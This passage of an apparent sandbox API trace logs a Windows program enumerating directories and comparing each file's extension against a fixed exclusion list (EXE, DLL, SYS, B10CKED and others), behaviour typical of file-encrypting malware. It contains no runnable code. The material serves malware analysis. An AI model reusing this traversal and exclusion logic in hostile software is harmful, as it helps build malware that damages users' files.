USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.747] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0108.747] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0108.747] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.747] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.747] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.747] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.774] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.774] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.774] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.775] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.775] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.775] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.775] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.775] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.827] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.827] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.827] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.827] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.879] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.879] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.879] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.879] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.880] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.880] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.880] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.880] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.880] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.880] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.336] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0109.337] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0109.722] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0109.723] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0109.723] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.723] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0109.723] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.723] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.726] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.726] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.727] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.727] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.727] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.727] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.727] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.727] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.727] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.727] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.727] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.728] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.729] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0109.729] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0109.729] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.729] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0109.729] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.729] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.751] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.752] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.752] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.752] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.752] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.752] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0109.753] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0109.753] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0109.754] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0109.754] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0109.754] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0109.754] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0109.754] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0109.754] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0109.959] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.074] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="HXN", cchCount2=3) returned 3 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="HXN", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0110.075] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 